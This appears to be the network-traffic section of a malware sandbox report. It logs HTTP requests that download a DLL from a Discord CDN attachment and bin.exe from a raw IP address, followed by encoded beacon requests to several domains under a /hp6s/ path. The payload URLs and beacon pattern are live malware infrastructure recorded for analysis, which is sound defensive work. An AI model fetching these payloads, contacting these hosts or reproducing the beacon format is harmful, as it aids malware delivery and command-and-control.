Network Analysis

GET /attachments/888348114673598475/890866414997635092/TNG.dll HTTP/1.1 User-Agent: Mozilla 4.0 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 06:57:25 GMT Content-Type: application/x-msdos-program Content-Length: 113152 Connection: keep-alive CF-Ray: 695b13d3aecfa249-ICN Accept-Ranges: bytes Age: 92128 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=TNG.dll ETag: "e889031780d41c9bfad18160301aae89" Expires: Wed, 28 Sep 2022 06:57:25 GMT Last-Modified: Fri, 24 Sep 2021 07:45:04 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1632469504868379 x-goog-hash: crc32c=V+MtTg== x-goog-hash: md5=6IkDF4DUHJv60YFgMBquiQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 113152 X-GUploader-UploadID: ADPycdspJyRuFE27Qeammi0Yf0z75S6UeVJXLz_rbjczlobl348rYodMO9krM0RLtbuegGELRyRscCxV0D3MbGTh6StD4kvTMA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=34xpmtg8QkbSqIyEaaEqJJnfI0wCxVO%2Fefz%2BdQJBuDcfqohDAWqRtKrICbsjE7LMVkvXgv38Dc%2Bsnywlv%2FFE5AdQOWGI6HSW2w05%2Bfs4lSCwxBmUK0t5m%2BxTxL7CAL6SE22Dbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /xxm/bin.exe HTTP/1.1 Host: 31.210.20.22 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 06:57:22 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 Last-Modified: Mon, 27 Sep 2021 02:19:23 GMT ETag: "2e400-5ccf0b9b0a569" Accept-Ranges: bytes Content-Length: 189440 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /hp6s/?CPG=dcOC7cI3oFnEfS9GsSVSHnbVWf/igqk97prd+XkG3EO6PgEaTghsJ+vTu1hjJo0Q2PG/bv5y&3f=Yn9ps0vxNLc HTTP/1.1 Host: www.sadguruenterprisesindia.com Connection: close

HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Tue, 28 Sep 2021 06:58:06 GMT Content-Type: text/html Content-Length: 178 Connection: close Vary: Accept-Encoding

GET /hp6s/?CPG=Fw5YSRn6B6q7Vo6CTsfssUahdbXa4r2ZD7nmGGCHLkY8GDkOmUQxWePCsmLEOuwwrsL9h5YF&3f=Yn9ps0vxNLc HTTP/1.1 Host: www.rlgbsuilds.com Connection: close

HTTP/1.1 301 Moved Permanently Date: Tue, 28 Sep 2021 6:58:20 GMT Connection: close Content-Length: 0 X-Frame-Options: SAMEORIGIN Cache-Control: private, no-cache, no-store, max-age=0 Expires: Mon, 01 Jan 1990 0:00:00 GMT Location: https://www.rlgbsuilds.com/hp6s/?CPG=Fw5YSRn6B6q7Vo6CTsfssUahdbXa4r2ZD7nmGGCHLkY8GDkOmUQxWePCsmLEOuwwrsL9h5YF&3f=Yn9ps0vxNLc

GET /hp6s/?CPG=2bYopOGPOIVcz7tJsXUx3GFEgu0QV8cVsQS3JlFK1exizYXGI9lPCJa/BJy6fy+FVLDUc5Qt&3f=Yn9ps0vxNLc HTTP/1.1 Host: www.fuyrew.online Connection: close

HTTP/1.1 403 Forbidden Date: Tue, 28 Sep 2021 06:58:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: -1 X-Dc: gcp-asia-northeast2 X-Request-ID: 0960e1d2-1f60-4771-9221-b5e9a747bfa1 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 695b15c86e96fce9-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400